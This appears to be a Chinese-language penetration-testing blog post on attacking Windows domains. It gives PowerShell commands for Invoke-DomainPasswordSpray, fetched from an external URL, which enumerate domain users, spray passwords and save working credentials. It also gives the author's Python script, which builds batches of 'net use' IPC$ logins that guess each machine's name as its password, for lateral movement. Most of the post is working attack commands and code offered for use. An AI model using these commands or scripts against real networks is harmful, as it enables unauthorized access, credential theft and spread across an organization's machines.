前言:根据用户名密码规则来进行模糊测试
Invoke-DomainPasswordSpray.ps1脚本地址:http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt
自动生成来自当前用户域的用户列表,并尝试使用每个用户名和Winter2016
密码进行身份验证。
powershell Invoke-DomainPasswordSpray.ps1 -Password Winter2016
从域中收集用户列表存储到user.txt中
Import-Module .\Invoke-DomainPasswordSpray.ps1
Get-DomainUserList -Domain pentest.God -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii user.txt
从users.txt中提取用户名,与pass.txt中的密码对照成一对口令,进行域认证枚举,登录成功的结果将会输出到sprayed-creds.txt
powershell .\Invoke-DomainPasswordSpray.ps1 -UserList user.txt -Domain pentest.God -PasswordList pass.txt -OutFile sprayed-creds.txt
之前看到冰冰的操作:洗数据,自己也尝试的写了一个方便来横向,自己的思路就简单点就直接机器名和密码相同进行传递,然后还可以进行改改,上面的ps脚本是来进行域中用户来进行攻击的,自己就尝试本地组来进行测试,虽然有点鸡肋,确实鸡肋,就当作自己练习了下吧,以后有好的想法再改!
# coding=utf-8
# 拆分域机器名,拼凑ipc格式,进行批量ipc
import re
import sys
content_regexp = "\s+" # 多个空格进行字符串拆分到数组
LocalNetUseFormat = "net use \\\\{0} /u:a\\{1} {2}"
DomainNetUseFormat = "net use \\\\{0} /u:{1}\\{2} {3}"
# 首先把net group "Domain Computers" /domain得到的域机器名字放在文本中
with open("C:\\Users\\dell\\Desktop\\自己练手脚本\\IPC$横向批处理\\computer.txt", 'r') as f:
content = f.read()
# print(content_line)
computer_content_array = re.split(content_regexp, content)
# with open("domain_computer_username.txt", 'w') as b: # 只能写,如果文件不存在则创建
for computer in computer_content_array:
# b.write(computer[:-1] + "\n")
print(LocalNetUseFormat.format(
computer[:-1], computer[:-1], computer[:-1])) # 账号为机器名 密码为机器名
#print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "pass@123"))
#print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "p@ssw0rd"))
#print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + computer[:-1] + "123"))
# print("处理成功,保存在当前目录下的domain_computer_username.txt文件中....")